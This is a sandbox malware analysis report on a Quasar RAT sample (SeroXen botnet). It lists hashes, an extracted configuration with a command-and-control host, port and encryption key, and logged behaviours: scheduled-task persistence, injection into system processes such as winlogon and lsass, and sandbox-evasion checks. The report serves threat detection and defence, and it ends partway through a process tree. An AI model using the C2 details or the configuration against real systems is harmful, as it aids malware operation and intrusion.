quasar | abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6

Analysis

max time kernel
161s
max time network
189s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
12-05-2024 06:14

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Uni.exe
Size

409KB
MD5

4c2bb0618a6eda615c8001d5a7ccd6c0
SHA1

c88d2c8bfc5906a5cfef78893d1132edcffd71f0
SHA256

abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6
SHA512

6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027
SSDEEP

12288:rpg6M1i1v6q1ak/e7xlX7nnvGAwhJLJO:lxqiii6xlLvGjhO

Score

10^/10

quasar seroxen spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

tue-jake.gl.at.ply.gg:29058

Mutex

$Sxr-xPAuDxLNyBmZ7S2WLJ

Attributes

encryption_key
Pw78RUs175dFrKD7lMwH
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
SeroXen
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4624-1-0x0000000000F40000-0x0000000000FAC000-memory.dmp	family_quasar
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 5068 created 632 5068 powershell.EXE winlogon.exe
PID 3368 created 632 3368 powershell.EXE winlogon.exe

description	pid	process	target process
PID 5068 created 632	5068	powershell.EXE	winlogon.exe
PID 3368 created 632	3368	powershell.EXE	winlogon.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Executes dropped EXE 5 IoCs

Processes:

Client.exeinstall.exeinstall.exeXdYRHiNDnO3c.exerg3SxrWLFAjq.exe

pid process

4804 Client.exe
4444 install.exe
3372 install.exe
2104 XdYRHiNDnO3c.exe
6000 rg3SxrWLFAjq.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
6 raw.githubusercontent.com
9 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

pid	process
4804	Client.exe
4444	install.exe
3372	install.exe
2104	XdYRHiNDnO3c.exe
6000	rg3SxrWLFAjq.exe

flow	ioc
1	raw.githubusercontent.com
6	raw.githubusercontent.com
9	raw.githubusercontent.com

flow	ioc
1	ip-api.com

Drops file in System32 directory 7 IoCs

Processes:

svchost.exeOfficeClickToRun.exepowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description	pid	process	target process
PID 5068 set thread context of 1636	5068	powershell.EXE	dllhost.exe
PID 3368 set thread context of 2348	3368	powershell.EXE	dllhost.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeSCHTASKS.exeschtasks.exe

pid process

3932 schtasks.exe
3424 SCHTASKS.exe
4116 schtasks.exe

pid	process
3932	schtasks.exe
3424	SCHTASKS.exe
4116	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\983bb3b6_0	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\983bb3b6_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001\|\\Device\\HarddiskVolume2\\Users\\Admin\\AppData\\Local\\Temp\\XdYRHiNDnO3c.exe%b{00000000-0000-0000-0000-000000000000}"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ba248efc_0	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ba248efc_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001\|\\Device\\HarddiskVolume2\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe%b{00000000-0000-0000-0000-000000000000}"	svchost.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEsvchost.exepowershell.EXEsvchost.exeOfficeClickToRun.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 12 May 2024 06:16:04 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={AB8DFF1D-1BD3-4F72-B52C-462C0144D93A}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE

Modifies registry class 1 IoCs

Processes:

Explorer.EXE

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.EXEpowershell.EXEdllhost.exedllhost.exeClient.exewmiprvse.exe

pid	process
5068	powershell.EXE
5068	powershell.EXE
3368	powershell.EXE
3368	powershell.EXE
5068	powershell.EXE
1636	dllhost.exe
1636	dllhost.exe
1636	dllhost.exe
1636	dllhost.exe
3368	powershell.EXE
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
4804	Client.exe
4572	wmiprvse.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
4804	Client.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
4804	Client.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
4804	Client.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe
2348	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3264 Explorer.EXE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

Processes:

msedge.exe

pid process

4968 msedge.exe
4968 msedge.exe
4968 msedge.exe
4968 msedge.exe
4968 msedge.exe
4968 msedge.exe
4968 msedge.exe
4968 msedge.exe

pid	process
3264	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Uni.exeClient.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	4624	Uni.exe
Token: SeDebugPrivilege	4804	Client.exe
Token: SeDebugPrivilege	5068	powershell.EXE
Token: SeDebugPrivilege	3368	powershell.EXE
Token: SeDebugPrivilege	5068	powershell.EXE
Token: SeDebugPrivilege	1636	dllhost.exe
Token: SeDebugPrivilege	3368	powershell.EXE
Token: SeDebugPrivilege	2348	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2692	svchost.exe
Token: SeIncreaseQuotaPrivilege	2692	svchost.exe
Token: SeSecurityPrivilege	2692	svchost.exe
Token: SeTakeOwnershipPrivilege	2692	svchost.exe
Token: SeLoadDriverPrivilege	2692	svchost.exe
Token: SeSystemtimePrivilege	2692	svchost.exe
Token: SeBackupPrivilege	2692	svchost.exe
Token: SeRestorePrivilege	2692	svchost.exe
Token: SeShutdownPrivilege	2692	svchost.exe
Token: SeSystemEnvironmentPrivilege	2692	svchost.exe
Token: SeUndockPrivilege	2692	svchost.exe
Token: SeManageVolumePrivilege	2692	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2692	svchost.exe
Token: SeIncreaseQuotaPrivilege	2692	svchost.exe
Token: SeSecurityPrivilege	2692	svchost.exe
Token: SeTakeOwnershipPrivilege	2692	svchost.exe
Token: SeLoadDriverPrivilege	2692	svchost.exe
Token: SeSystemtimePrivilege	2692	svchost.exe
Token: SeBackupPrivilege	2692	svchost.exe
Token: SeRestorePrivilege	2692	svchost.exe
Token: SeShutdownPrivilege	2692	svchost.exe
Token: SeSystemEnvironmentPrivilege	2692	svchost.exe
Token: SeUndockPrivilege	2692	svchost.exe
Token: SeManageVolumePrivilege	2692	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2692	svchost.exe
Token: SeIncreaseQuotaPrivilege	2692	svchost.exe
Token: SeSecurityPrivilege	2692	svchost.exe
Token: SeTakeOwnershipPrivilege	2692	svchost.exe
Token: SeLoadDriverPrivilege	2692	svchost.exe
Token: SeSystemtimePrivilege	2692	svchost.exe
Token: SeBackupPrivilege	2692	svchost.exe
Token: SeRestorePrivilege	2692	svchost.exe
Token: SeShutdownPrivilege	2692	svchost.exe
Token: SeSystemEnvironmentPrivilege	2692	svchost.exe
Token: SeUndockPrivilege	2692	svchost.exe
Token: SeManageVolumePrivilege	2692	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2692	svchost.exe
Token: SeIncreaseQuotaPrivilege	2692	svchost.exe
Token: SeSecurityPrivilege	2692	svchost.exe
Token: SeTakeOwnershipPrivilege	2692	svchost.exe
Token: SeLoadDriverPrivilege	2692	svchost.exe
Token: SeSystemtimePrivilege	2692	svchost.exe
Token: SeBackupPrivilege	2692	svchost.exe
Token: SeRestorePrivilege	2692	svchost.exe
Token: SeShutdownPrivilege	2692	svchost.exe
Token: SeSystemEnvironmentPrivilege	2692	svchost.exe
Token: SeUndockPrivilege	2692	svchost.exe
Token: SeManageVolumePrivilege	2692	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2692	svchost.exe
Token: SeIncreaseQuotaPrivilege	2692	svchost.exe
Token: SeSecurityPrivilege	2692	svchost.exe
Token: SeTakeOwnershipPrivilege	2692	svchost.exe
Token: SeLoadDriverPrivilege	2692	svchost.exe
Token: SeSystemtimePrivilege	2692	svchost.exe
Token: SeBackupPrivilege	2692	svchost.exe
Token: SeRestorePrivilege	2692	svchost.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

msedge.exe

pid	process
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid	process
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe
4968	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Client.exe

pid process

4804 Client.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

RuntimeBroker.exe

pid process

3828 RuntimeBroker.exe

pid	process
4804	Client.exe

pid	process
3828	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Uni.exeClient.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 4624 wrote to memory of 3932	4624	Uni.exe	schtasks.exe
PID 4624 wrote to memory of 3932	4624	Uni.exe	schtasks.exe
PID 4624 wrote to memory of 3932	4624	Uni.exe	schtasks.exe
PID 4624 wrote to memory of 4804	4624	Uni.exe	Client.exe
PID 4624 wrote to memory of 4804	4624	Uni.exe	Client.exe
PID 4624 wrote to memory of 4804	4624	Uni.exe	Client.exe
PID 4624 wrote to memory of 4444	4624	Uni.exe	install.exe
PID 4624 wrote to memory of 4444	4624	Uni.exe	install.exe
PID 4624 wrote to memory of 4444	4624	Uni.exe	install.exe
PID 4624 wrote to memory of 3424	4624	Uni.exe	SCHTASKS.exe
PID 4624 wrote to memory of 3424	4624	Uni.exe	SCHTASKS.exe
PID 4624 wrote to memory of 3424	4624	Uni.exe	SCHTASKS.exe
PID 4804 wrote to memory of 4116	4804	Client.exe	schtasks.exe
PID 4804 wrote to memory of 4116	4804	Client.exe	schtasks.exe
PID 4804 wrote to memory of 4116	4804	Client.exe	schtasks.exe
PID 4804 wrote to memory of 3372	4804	Client.exe	install.exe
PID 4804 wrote to memory of 3372	4804	Client.exe	install.exe
PID 4804 wrote to memory of 3372	4804	Client.exe	install.exe
PID 5068 wrote to memory of 1636	5068	powershell.EXE	dllhost.exe
PID 5068 wrote to memory of 1636	5068	powershell.EXE	dllhost.exe
PID 5068 wrote to memory of 1636	5068	powershell.EXE	dllhost.exe
PID 5068 wrote to memory of 1636	5068	powershell.EXE	dllhost.exe
PID 5068 wrote to memory of 1636	5068	powershell.EXE	dllhost.exe
PID 5068 wrote to memory of 1636	5068	powershell.EXE	dllhost.exe
PID 5068 wrote to memory of 1636	5068	powershell.EXE	dllhost.exe
PID 5068 wrote to memory of 1636	5068	powershell.EXE	dllhost.exe
PID 1636 wrote to memory of 632	1636	dllhost.exe	winlogon.exe
PID 1636 wrote to memory of 692	1636	dllhost.exe	lsass.exe
PID 1636 wrote to memory of 996	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 480	1636	dllhost.exe	dwm.exe
PID 1636 wrote to memory of 752	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 440	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1108	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1124	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1148	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1200	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1272	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1328	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1340	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1396	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1568	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1616	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1628	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1672	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1716	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1780	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1836	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1876	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1952	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1968	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1536	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 1724	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 2136	1636	dllhost.exe	spoolsv.exe
PID 1636 wrote to memory of 2312	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 2400	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 2504	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 2516	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 2540	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 2624	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 2640	1636	dllhost.exe	sysmon.exe
PID 1636 wrote to memory of 2672	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 2692	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 2704	1636	dllhost.exe	svchost.exe
PID 1636 wrote to memory of 2280	1636	dllhost.exe	sihost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:480

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f7834958-b586-4f72-989e-6f9f372d4694}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b56fe78d-88c5-4511-8b32-de42bf4cd59c}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39c9855 /state1:0x41c64e6d
2⤵
PID:5948

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
